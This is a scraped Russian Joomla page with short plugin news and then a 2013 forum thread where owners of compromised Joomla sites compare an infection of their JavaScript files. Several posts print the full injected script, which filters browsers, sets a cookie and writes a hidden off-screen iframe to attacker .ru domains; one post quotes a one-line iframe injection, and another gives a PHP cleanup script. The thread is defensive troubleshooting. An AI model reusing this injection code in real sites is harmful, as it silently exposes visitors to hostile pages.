Новости Joomla

InterLinked - плагин автоматической внутренней перелинковки для Joomla

InterLinked - плагин автоматической внутренней перелинковки для Joomla

👩‍💻 InterLinked - плагин автоматической внутренней перелинковки для Joomla.Несвязанные статьи - это молчаливый убийца привлекательности вашего сайта на Joomla, который заставляет читателей сворачивать работу и подрывает эффективность вашего SEO. Content - InterLinked - это бесплатный, проверенный в боях плагин, который кладет конец этой бессмыслице, автоматически генерируя ссылки на основе ключевых слов между статьями на вашем сайте Joomla 5. Он создает сеть связей, используя ключевые слова статей (metakey) и ассоциации категорий, с настраиваемыми всплывающими подсказками, целевыми объектами ссылок и классами CSS, сохраняя при этом существующие ссылки и повышая производительность за счет кэширования. Кроме того, ссылки со временем меняются по мере того, как в новых статьях используются ключевые слова, что делает ваш контент свежим и актуальным.Возможности.- автоматическая перелинковка на основе значения meta-keywords материалов- встроенная поддержка материалов Joomla- пользовательские ассоциации категорий для создания ссылок (например "Блог" к "Учбеникам")- показ всплывающих подсказок к автоматическим ссылкам (опционально)- настраиваемый атрибут target для ссылок.- указание CSS класса для стилизации ссылок- кэширование совпадений ключевых слов и их ассоциаций- учёт существующих тегов <a> во избежание дублирующих ссылок- автоматическое добавление новых ссылок при появлении новых ассоциаций- веб-доступность: ARIA для ссылок с target="_blank".Плагин бесплатный. Заявлена поддержка Joomla 4 и Joomla 5.Joomla Extensions DirectoryСтраница расширенияСкачать@joomlafeed#joomla #расширения #seo

joomLab Gallery - плагин галереи изображений для Joomla

👩‍💻 joomLab Gallery - плагин галереи изображений для Joomla.Плагин joomLab Gallery позволит Вам добавлять в любой материал неограниченное количество галерей, а главное удобно управлять файлами и эффектами в каждой галерее.Плагин использует популярны скрипты Swiper.js и FancyBox. Первый для крутой организации и эффектов галерей, а второй для красивого и функционального показа оригинальных изображений на Вашем сайте.На данный момент плагин имеет 10 макетов вывода - это 10 различных эффектов галерей и Вы можете совмещать все 10 в 1 материале.Плагин позволяет гибко настраивать индивидуально каждую галерею в материале. Вы можете выбрать макет, эффекты и даже можете управлять функциями всплывающего окна изображения.Недостатки.Такой вид реализации не предусматривает выбор изображения на сервере. Т.е. Вы не можете выбрать уже добавленное фото, только загружать заново. Плагин не предоставляет возможности доступа к медиа-менеджеру.Плагин бесплатный. Разработчик - участник нашего сообщества Александр Новиков (@pro-portal).Страница расширения@joomlafeed#joomla #расширения

Готовлю большой выпуск, включающий интервью с участниками Joomla Ну что, интересная инициатива от...

Готовлю большой выпуск, включающий интервью с участниками Joomla Ну что, интересная инициатива от...

Готовлю большой выпуск, включающий интервью с участниками Joomla 🖨Ну что, интересная инициатива от @webtolkru в виде интервью с разными участниками весьма меня увлекла. Я, вооружившись данным примером, решил подготовить выпуск для NorrNext (@norrnext) и экстраполировал идею на международный масштаб. Теперь готовлю эксклюзивный выпуск с участниками Joomla сообщества со всего мира, которые, в той или иной мере, внесли свой вклад в развитие и популяризацию системы. Будут беседы с людьми из разных стран и фото с юбилейной символикой 📸Работа в процессе 👆 📝О результатах оповещу отдельно.

1 2 3 ... 12   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 356 Ответов
  • 78088 Просмотров
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
[Решено] Заразились в один день 4 аккаунта по 10 сайтов
« : 25.03.2013, 13:29:48 »
Левый код в скриптах ниже.
Не могу понять как это попало. Все сайты после последнего заражения в январе обновлены.
JCE везде прибит. Версия Jooma 1.5.26


Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/19.0.2','SymbianOS'];
 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('b1004dc22');
 if (cookie == undefined) {
  setCookie('b1004dc22', true, 3600);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-1000px;top:-1000px;" src="http://impeccablepreselected.ru/JJJ7P.8Qd6?default"></iframe>');
 }
};
})();/*eaa795220*//* begin Page */

« Последнее редактирование: 10.04.2013, 06:40:55 от AlexSmirnov »
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #1 : 25.03.2013, 19:23:30 »
Так может еще и поискать шелл, бекдор  в файлах сайтов ?
Записан
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #2 : 25.03.2013, 22:02:07 »
Ищу уже сутки
Записан
*

greywolf

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #3 : 26.03.2013, 12:43:51 »
В каких файлах код?
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #4 : 09.04.2013, 05:02:26 »
У меня заразились все *.js файлы 10 сайтов на 1 акке хостинга. Joomla 1.5.26, 2.5.8, 1.7.5.
Яндекс сегодня прислал письмо, что на 1-м из сайтов есть вредоносный код, но раз у меня такая фигня уже была в январе этого года, то я сразу проверил все сайты где есть *.js файлы и все они оказались заражены.
Предыдущий вирусняк менял дату создания (изменения) файла, а этот хитрее - не меняет.

Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/19.0.2','Firefox/20.0','SymbianOS'];
 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('b1004dc22');
 if (cookie == undefined) {
  setCookie('b1004dc22', true, 259200);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-1000px;top:-1000px;" src="http://hotbarpaying.ru/rejtmn3.cCvNYTc?default"></iframe>');
 }
};
})();/*eaa795220*/
Записан
*

Go-destroy

  • Захожу иногда
  • 221
  • 4 / 1
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #5 : 09.04.2013, 05:52:48 »
стилеры не дремлют...
Записан
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #6 : 09.04.2013, 08:31:41 »
Не дочистили значит. Ищите шеллы и бекдоры.
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #7 : 09.04.2013, 12:35:50 »
Я забыл упомянуть, что на 1-м из сайтов стояла Joomla 3.0.3 и быстрее всего косяк шёл через неё, т.к. пока 1 из сайтов не был на ней сделан всё было ОК, т.к. до января этого года, а так уже 2-й раз за 3 мес.
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #8 : 09.04.2013, 13:30:37 »
Нашёл подозрительные записи в логах нескольких сайтов
176.9.36.168 - - [08/Apr/2013:19:07:58 +0400] "GET / HTTP/1.1" 200 100534 "-" "-"
178.137.166.129 - - [08/Apr/2013:02:30:35 +0400] "GET /main/about-site.html+%5BPLM=0%5D%5BN%5D+GET+http://site.ru/main/about-site.html+%5B0,48462,76401%5D+-%3E+%5BN%5D+POST+http://site.ru/main/about-site.html+%5B0,0,76401%5D+-%3E+%5BN%5D+GET+http://site.ru/main/about-site.html+%5B75305,0,76401%5D HTTP/1.0" 404 389 "http://www.bestplacevanquepated1978.xpg.com.br/v-kakom-banke-mozhno-vzyat-kredit-v-razmere-ot-700000-do-1000000.html" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
94.77.186.182 - - [08/Apr/2013:18:59:43 +0400] "GET /components/com_phocagallery/assets/images/shahttp://site.ru/administrator/index.php?option=com_content%C2%A7ionid=11&task=edit&cid[]=182 HTTP/1.1" 404 920 "http://site.ru/natali-leshhenko.html" "Opera/9.80 (Windows NT 6.1; Win64; x64; U; Edition Next; ru) Presto/2.11.310 Version/12.50"
178.137.166.129 - - [09/Apr/2013:03:27:27 +0400] "GET /ad/add-ad.html+%5BPLM=0%5D+GET+http://site.ru/ad/add-ad.html+%5B0,42200,50519%5D+-%3E+%5BN%5D+POST+http://site.ru/ad/add-ad.html+%5B0,0,52134%5D HTTP/1.0" 404 389 "http://bestplacetrl6857.boxhost.me/brokery-v-krivoy-rog-vzyat-kredit.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
« Последнее редактирование: 09.04.2013, 13:33:53 от JASON X »
Записан
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #9 : 09.04.2013, 20:48:01 »
Ну вы внимательно изучали файлы, оказалось что заражено не только начало файла, но еще и конец. В конце можно найти иснтуркцию
Код: html4strict
;;document.write('<iframe src="http://muhost.mrslove.com/7adc59e6.BemrmfFYEukF?default" name="Olegor" height="90" width="90" style="left:-500px;top:0px;position:fixed;"></iframe>');
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #10 : 09.04.2013, 20:55:15 »
Зашёл на свои сайты минут 20 назад проверил и оказалось, что дополнительного вредоносного кода нету, ни на 1-м сайте, но доступ то остался у этих плохих людей....
Записан
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #11 : 09.04.2013, 21:05:14 »
Варез был/есть на тех сайтах?
Записан
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #12 : 09.04.2013, 21:13:07 »
Цитата: AlexSmirnov от 09.04.2013, 21:05:14
Варез был/есть на тех сайтах?

Походу его там полно.

Цитата: JASON X от 09.04.2013, 20:55:15
Зашёл на свои сайты минут 20 назад проверил и оказалось, что дополнительного вредоносного кода нету, ни на 1-м сайте, но доступ то остался у этих плохих людей....

Дык вроде почистил
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #13 : 10.04.2013, 06:21:17 »
Цитата: AlexSmirnov от 09.04.2013, 21:05:14
Варез был/есть на тех сайтах?
Если Вы имеете в виду скачанные не с оф сайтов расширения, то да, были, в частности и сам шабл. Тем более не всё я делал, что-то и друг делал.
Понятно, что, скажем так, нежелательно использовать варез, но когда я только начинал делать сайты, то не было ни денег ни опыта, новый сайт уже буду создавать учтя все косяки и буду покупать расширения.

Закончил чистку, восстановил все сайты из чистых бэкапов, не стал заморачиватсья со скриптами, которые мне почистят файлы, так для меня проще, тем более что уже опыт есть.
« Последнее редактирование: 10.04.2013, 06:28:16 от JASON X »
Записан
*

nbserg

  • Захожу иногда
  • 166
  • 0 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #14 : 29.04.2013, 19:01:59 »
и что же тут решено?
уязвимость откуда?
раньше
Код
 ;;document.write('<iframe src="http://muhost.mrslove.com/7adc59e6.BemrmfFYEukF?default" name="Olegor" height="90" width="90" style="left:-500px;top:0px;position:fixed;"></iframe>');
это был в JCE
а теперь из за чего?
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #15 : 02.05.2013, 22:43:29 »
Сейчас проверил и опять.... Вот такой код во всех ява скриптах на всех сайтах на аккаунте:
Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function papirosa(){
 var denyList = ['Chrome'];
 var denyUA = false;
 for (var i in denyList) {
  if (stripos(navigator.userAgent, denyList[i])) {
   denyUA = true;
   break;
  }
 }
 return denyUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!papirosa()) {
 var cookie = getCookie('smy01b199cd');
 if (cookie == undefined) {
  setCookie('smy01b199cd', true, 432001);	
  document.write('<iframe height="117" style="position:absolute;left:-1000px;top:-1000px;" width="117" src="http://myobunsubstantiated.ru/juyt9.XTjoha?default"></iframe>');
 }
};
})();/*eaa795220*//**
Какое-то расширение наверно с багом.
Записан
*

LS_D

  • Захожу иногда
  • 155
  • 16 / 0
Re: Заразились в один день 4 аккаунта по 10 сайто&#
« Ответ #16 : 03.05.2013, 00:31:50 »
Тоже самое, главное сменил все пароли и поставил атрибуты 444 на файлы js, так эта зараза меняет атрибуты на 644 и прописывает этот код. У Вас случаем хостер не рег.ру?
Странно, как скрипт прописывающий код в файл может поменять атрибут или это снова рег.ру нас радует.
« Последнее редактирование: 03.05.2013, 00:43:07 от LS_D »
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #17 : 03.05.2013, 00:41:44 »
LS_D тоже менял за этот год поле заражения 2 раза пароли от всего на хостинге (входа в админку хостинга, сайтов, баз данных и т.д.), но всё равно какая-то сволочь всё портит.
Тоже думал о смене прав для ява скриптов, но это вряд ли поможет, т.к. эта хрень получает root права и соответственно может делать что хочет в файлах сайтов.
У меня хостер ihc.ru.
Тут дело не в хостере, а в расширениях, какое-то из них с брешью в безопасности и поэтому через него вирусняк и лезет, а вот какое именно расширение, или может это вообще брешь в самой Joomla 1.5 - это самый большой вопрос.
Записан
*

LS_D

  • Захожу иногда
  • 155
  • 16 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #18 : 03.05.2013, 00:52:58 »
У меня Joomla 2.5 везде, вот только что именно хз, последнее ставил uddeIM, сейчас снесу прочищи и посмотрю
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #19 : 03.05.2013, 01:03:26 »
У меня Jooml'ы разные: Joomla 1.5.26, 1.7.5, 2.5.x. На всех сайтах разные расширения, кроме 1.5.26.
uddeIM у меня ни на1-м из сайтов не установлено.
Сейчас проверил - вирусный скрипт сменился:
Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0';
 blackList = blackList.split('|');

 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])!==false) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('smy01b199cd');
 if (cookie == undefined) {
  setCookie('smy01b199cd', true, 432001);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-999px;top:-999px;" src="http://fulldug.ru/ifg.benDa?default"></iframe>');
 }
};
})();/*eaa795220*//*
« Последнее редактирование: 03.05.2013, 01:17:27 от JASON X »
Записан
*

Leva27

  • Осваиваюсь на форуме
  • 41
  • 3 / 0
  • Дальвебстудия
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #20 : 03.05.2013, 03:26:53 »
Заругался Яндекс на содержание вредоносного кода на сайте, начал искать, оказывается пролез на сайт в caption.js и progressbar.js код:

Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0';
 blackList = blackList.split('|');

 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])!==false) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('smy01b199cd');
 if (cookie == undefined) {
  setCookie('smy01b199cd', true, 432001);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-999px;top:-999px;" src="http://ibackupplace.ru/jdruy.PGNbn?default"></iframe>');
 }
};
})();/*eaa795220*//*
		GNU General Public License version 2 or later; see LICENSE.txt
*/
var JCaption=new Class({initialize:function(a){this.selector=a;$$(a).each(function(a){this.createCaption(a)},this)},createCaption:function(a){var f=document.createTextNode(a.title),c=document.createElement("div"),d=document.createElement("p"),e=a.getAttribute("width"),b=a.getAttribute("align");if(!e)e=a.width;b||(b=a.getStyle("float"));if(!b)b=a.style.styleFloat;if(b==""||!b)b="none";d.appendChild(f);d.className=this.selector.replace(".","_");a.parentNode.insertBefore(c,a);c.appendChild(a);a.title!=
""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});;;

Версия Joomla 2.5.11, расширения стоят нормальные, что вы там про JCE говорили?
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #21 : 03.05.2013, 08:09:14 »
Leva27 проверьте остальные скрипты - он уже во всех есть. У меня заразил около 10 сайтов на 1 акке и ява скрипты заразились все.
Записан
*

LS_D

  • Захожу иногда
  • 155
  • 16 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #22 : 03.05.2013, 08:11:16 »
Это не JCE, я его со всех сайтов давно удалил. Буду разносить сайты клиентов по разным хостингам, пролечивать и смотреть на каком и какое расширение с дырой.
Записан
*

SorokinS

  • Захожу иногда
  • 165
  • 12 / 1
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #23 : 03.05.2013, 10:24:11 »
1-3 мая залили sheell  и опять все JS поражены.

Пользую FLS.PHP (http://joomlaforum.ru/index.php/topic,198048.0.html) и REP.PHP (не помню где брал)
первое ищет подозрительные файлы, второй вырезает нужную часть кода из нужных файлов.

В этом заражении вставлен большой, многострочный код.

Я чет никак не могу его засунуть в код реплейсера, подсобите:

Код
<?php
$root  =  $_SERVER['DOCUMENT_ROOT'];
$search = '[b]СЮДА[/b]'; //строка, которую нужно найти в каждом файле и заменить на ''
$thisfile = 'rep.php'; //чтобы в процессе не заменить искомую строку в этом же файле
function find_and_replace($dir,$search,$thisfile)
{

$new_dir = null;
$dir_files = opendir($dir);
    while(false !== ($file = readdir($dir_files)))
    {

        if($file != '.' && $file != '..')
        $new_dir[] = $dir."/".$file;
    }

        if($new_dir)
        foreach($new_dir as $check )
        {
              if((is_file($check)) && (basename($check)!== $thisfile) && ( (strtolower(substr($check,-4)) === '.tpl') || (strtolower(substr($check,-5)) === '.html') || (strtolower(substr($check,-3)) === '.js'))) {
                $handle = fopen($check, "rb");
                $contents = '';
                while (!feof($handle)) {
                  $contents .= fread($handle, 8192);
                }
                fclose($handle);
                if (strpos($contents,$search)!== false) {
                    $file = fopen ($check,"w+");
                    $str = str_replace($search,'',$contents);
                    fputs($file, $str);
                    fclose ($file);
                    echo $check."<br>";
                    }
              }
              elseif(is_dir($check))
              find_and_replace($check,$search,$thisfile);
        }
}
find_and_replace($root,$search,$thisfile);


JS код заражения:

Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function papirosa(){
 var denyList = ['Chrome'];
 var denyUA = false;
 for (var i in denyList) {
  if (stripos(navigator.userAgent, denyList[i])) {
   denyUA = true;
   break;
  }
 }
 return denyUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!papirosa()) {
 var cookie = getCookie('b19ad018sc');
 if (cookie == undefined) {
  setCookie('b19ad018sc', true, 292200);
  document.write('<iframe height="116" style="position:absolute;left:-1000px;top:-1000px;" width="116" src="http://jivemessageoriented.ru/iy7yhd.dgaPnykU?default"></iframe>');
 }
};
})();/*eaa795220*/
Записан
*

SorokinS

  • Захожу иногда
  • 165
  • 12 / 1
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #24 : 03.05.2013, 10:44:12 »
А в теме написано Решено, а где решение? Найдена дыра? В каком компоненте? Или решение - искать бэкдоры?)
Записан
*

RostovDriver

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #25 : 03.05.2013, 13:13:12 »
+1 к зараженным
Заражены этим же кодом все js на двух хостингах. После чистки js файлов иногда вредоносный код немного изменяется.
В логах ftp коннектов не было. Пароли к ftp, базе, админке хостинга, админкам сайтов изменил, нигде не сохраняются. В /images все чисто.
Месяц назад была подобная трабла, но тогда Касперский все нашел, причем не только код в js, но и кучу всего в php. Сейчас он да и все остальные ничего в упор не видят. Ругается только Sophos от Яндекса. Впрочем, даже локально в полностью выкачанных сайтах он только код в js находит, который появляется заново после чистки. Так что смысла его косить, пока не найдена дыра просто нет. Я так понимаю, основной код где-то сидит и периодически обновляет или заново прописывает код во все файлы js и пока этого "отца" не найдешь, все бесполезно. Прошу, если кто найдет где он спрятался сообщите мне страдальцу.
Чтобы Яндекс не ругался, отключил загрузку всех js во фронтэнде, но таки в админке они грузятся, так что валить их надо.
Ситуация осложнена тем, что дыра может быть на любом, сайте хостинга, а через него уже все остальные портятся. Я уж и на хостера готов эту траблу списать, хотя вообщем-то тоже бесполезно :)
Записан
*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #26 : 03.05.2013, 14:12:44 »
Аналогичная проблема с кодом в .js

Спойлер
[свернуть]

Заражены наверное все js файлы. Кроме того, наделано куча левых файлов с расширением .php с одинаковым содержимым:

Спойлер
[свернуть]
?>

Вирус видит только Яндекс с Софосом на пару. Больше никто не ругается...пока что...

Сайт Joomla - 2.5. JCE не стоит. При заходе с мобильного никаких редиректов не наблюдаю. Может, потому-что все php. файлы с base64_decode( уже удалил.

Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #27 : 03.05.2013, 14:39:52 »
А вы точно не с одного хостинга ?
п.с.
Кстати у JCE при удалении могли файлы остаться на хостинге.
В менеджере расширений не видно JCE , а таблицы в БД тоже остаются
« Последнее редактирование: 03.05.2013, 15:34:18 от draff »
Записан
*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #28 : 03.05.2013, 14:51:28 »
У меня хостинг hc.ru.
Записан
*

RostovDriver

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #29 : 03.05.2013, 15:24:26 »
Logol и Kubez
Записан
1 2 3 ... 12   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Изолирование папок сайтов на OpenServer

Автор Lemady

 Ответов: 41
Просмотров: 7854 		Последний ответ 29.11.2021, 15:47:31
от KoreshS
[Решено] В php файлах во всех появилась хрень какая-то появилось давно что это ?

Автор altyn

 Ответов: 72
Просмотров: 38875 		Последний ответ 17.01.2019, 00:51:02
от Roki37
Делаю почту в общих настройках через smtp - в тот же день ящик взломан

Автор Mehanick

 Ответов: 22
Просмотров: 1644 		Последний ответ 25.05.2018, 08:11:19
от dmitry_stas
На мобильном не работает сайт (решено, ошибка в андройде)

Автор dragon4x4

 Ответов: 5
Просмотров: 2100 		Последний ответ 01.03.2018, 22:46:10
от dragon4x4
В админке еще один администратор

Автор Lidia

 Ответов: 26
Просмотров: 2479 		Последний ответ 07.12.2017, 16:55:25
от Fess_N